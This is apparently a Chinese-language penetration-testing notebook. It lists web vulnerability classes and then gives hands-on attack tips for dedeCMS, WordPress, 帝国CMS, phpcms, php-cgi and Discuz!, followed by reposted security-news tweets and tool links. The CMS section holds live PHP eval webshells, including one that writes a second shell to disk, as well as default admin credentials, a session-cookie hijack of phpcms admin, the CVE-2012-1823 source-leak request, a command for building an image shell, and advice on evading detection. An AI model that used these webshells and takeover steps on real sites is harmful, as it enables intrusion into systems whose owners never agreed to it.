渗透测试的经验性规则

web漏洞分类

前端类

XSS家族
CSRF
JSONP跨域
点击劫持

动态脚本解析层/Web框架层

远程代码执行 (RCE)
文件包含
文件上传
逻辑漏洞
SQLi
信息泄漏 (备份文件,PHPinfo等)

服务器类

常见的服务器 Apache, Nginx
IIS
uwsgi, gunicorn, tornado (Python) -> 一般还是用 Nginx 代理出来

文件解析漏洞
权限配置不当
DDoS

数据库类

常见数据库

SQL Server, Access, MySQL, Oracle, Postgresql, MongoDB

缓冲区溢出
越权操作
配置不当
拒绝服务攻击

操作系统

本地提权、
缓冲区溢出、
远程代码执行、
拒绝服务攻击

常见CMS

dedeCMS

默认后台
/dede
如果找不到,可以选择去/data/mysqli_error_trace.inc这里找

JPG ,TxT,png什么的都不能上传的话,试试 htm
模版》默认模块管理》上传(新建)模版》上传(写)个htm的马

1
<?php eval ($_POST[a]); ?>

wordpress

app:”wordpress” ver:4.6

版本信息
readme.html

后台入口
wp-login.php

帝国CMS

e/admin/index.php
e/admin 默认后台
admin/admin 默认密码
e/class/config.php 默认配置文件路径
管理员所在数据库的默认表 enewsuser

已有后台m,加shell
新建 x.php.mod文件

1
<?fputs(fopen("index_backup.php","w"), "<?eval(\$_POST[content]);?>")?>

phpcms

v9.6.0

phpcms_v9.6.0_sql

exp 自行搜索

解密问题

由于phpcms密文较难解,通常在取得数据库权限后,使用 cookie 替换方式强制登录。

phpcms数据库中表v9_session中保存着admin登录的信息。
该表字段sessionid中保存的已经登录管理后台的PHPSESSID的值。

获取到该值后,替换cookie。
访问后台
/index.php?m=admin&c=index&a=public_menu_left

php-cgi

Apache 2.2.17 + PHP 5.2.14

CVE-2012-1823

泄漏php源码

1
e/admin/index.php?-s

亦可远程命令执行,待探索。

Discuz!

GD图片处理苦
通常使用 Nginx解析漏洞 从图片(通常是头像)处利用
Dz爆破工具 -> 抓取用户名,高等级用户弱口令探索

上传 图片shell时 图片可能被处理, 所以需要尽可能上传尺寸合适的图片shell(不被裁剪或放大)。

图片shell制作 (安全狗等可以检测图片shell,注意bypass)

1
copy 1.jpg /b + 1.txt 2.png

拿到shell以后注意看一下进程情况
tasklist

Nginx解析 判断

打开一张图片,在URL后面加上/a.php看看是不是乱码。
如果是,则存在nginx解析漏洞。
接下来需要寻找图片上传点。

md5

白帽时鉴期刊

https://xianzhi.aliyun.com/forum/read/1427.html

Vijay Kumar @bitvijays
[ Tools ] Execute Infra PenTest engagements faster! https://t.co/o8kDu21rRd Automated Scripts for Information gathering, Vulnerability analysis, etc.

“Pentest-Scripts - 常用的渗透测试脚本收集: http://t.cn/RXmg8re

[ Pentest ] Here’s my slides to my “Pwning the Enterprise With PowerShell” talk from @BsidesORL - https://t.co/VCvz5GFJqf #PowerShell #pentest
“ Powershell 企业渗透测试工具指南: http://t.cn/RXvaBz9

#Jed @JedCavins
[ Others ] wicked_cool_shellscripts_2e: PART DEUX!!! Full shell scripts for the 2nd edition of Wicked Cool Shell Scripts - https://t.co/bLZWxoSqx1
“《Wicked Cool Shell Scripts 2th》书籍中的脚本收集: https://t.co/bLZWxoSqx1

Nikhil Mittal @nikhil_mitt
[ Others ] Slides for my talk “PowerShell for Practical Purple Teaming” at @x33fcon. Blog post soon. #PowerShell #PurpleTeam https://t.co/Zu7Pe6SjWu
“ Powershell 在红蓝两队中的应用: https://www.slideshare.net/nikhil_mittal/powershell-for-practical-purple-teaming

Beau Bullock @dafthack
[ Others ] A good walkthrough for stripping metadata from PDFs - https://t.co/0HbYQ803H8
“一篇有关删除 PDF 元数据并锁定 PDF 以防止文档被再次编辑的教程:https://blog.joshlemon.com.au/protecting-your-pdf-files-and-metadata/

[ Popular Software ] 去年推送过利用 Outlook Rules 触发 Shell 执行攻击用户的技术,最近这个方法被微软修复了,于是作者看看能不能尝试新方法,于是找到了 Outlook Forms: https://sensepost.com/blog/2017/outlook-forms-and-shells/

https://sensepost.com/blog/2017/outlook-forms-and-shells/
https://github.com/sensepost/ruler
https://github.com/EmpireProject/Empire

之前看到了,没想到发,把黑客工具的用法说太细,感觉会犯法 :)

今天看玄武的微博抓到了这个,其实ruler + Empire是企业渗透必备神器,知道Exchange密码的情况下,通过远程添加规则在outook端远程执行程序,魔术般的黑客手法~

本地利用
https://silentbreaksecurity.com/malicious-outlook-rules/
远程利用
https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/

Matthew Risck @Mateusz_Jozef
[ Others ] A Meterpreter and Windows proxy case https://t.co/e3JE4fd6ES
“ A Meterpreter and Windows proxy case: https://medium.com/@br4nsh/a-meterpreter-and-windows-proxy-case-4af2b866f4a1

Florian Roth @cyb3rops
[ Tools ] certitude Python-based tool which aims at assessing the compromised perimeter during IR assignmentshttps://t.co/aRyYon8yKL
“ CERTitude - 应急响应处理时用于判断机器是否已经被攻破的工具: https://github.com/CERT-W/certitude

Michael Helwig @c0dmtr1x
[ Android ] Here it is: 3rd part of my #Android Hacking with Frida tutorial. @OWASP UnCrackable2 with @fridadotre and @radareorg https://t.co/D1D1NHjkaE
“Hacking Android apps with FRIDA 系列之三: https://t.co/D1D1NHjkaE

Binni Shah @binitamshah
[ Tools ] Leviathan Framework : wide range mass audit toolkit : https://t.co/6LMO6BuE8t cc @utku1337 || @ozgebarbaros
“leviathan - 大型安全审计工具包,支持大范围的服务探测、暴力破解、SQL注入检测以及运行自定义漏洞利用模块︰ http://t.cn/RXmYYP2

Vex Woo @Nixawk
[ Tools ] Python poc for CVE-2017-5689 Intel AMT - https://t.co/Vn8kgYnNPx
“ CVE-2017-5689 Intel AMT 提权漏洞 PoC: https://github.com/nixawk/labs/blob/master/CVE-2017-5689/CVE-2017-5689.py

John Regehr @johnregehr
[ Tools ] Z3str3 String Constraint Solver https://t.co/Y9zCzeX01Q
“ Z3 - Google 开源的约束求解器: https://github.com/z3prover/z3

l33tdawg @l33tdawg
[ Virtualization ] Try Deep Learning in Python now with a fully pre-configured VM - https://t.co/SJcBEjlVfH
“ 基于 Python 进行深度学习的 VM 虚拟机 : https://medium.com/@ageitgey/try-deep-learning-in-python-now-with-a-fully-pre-configured-vm-1d97d4c3e9b

Binni Shah @binitamshah
[ Tools ] Let’s Build A Simple Interpreter (Part 14 ) : Nested Scopes and a Source-to-Source Compiler : https://t.co/6Km99v4IsJ
“ 一起创建一个解释器 part 14: https://t.co/6km99v4isj

[1] somd5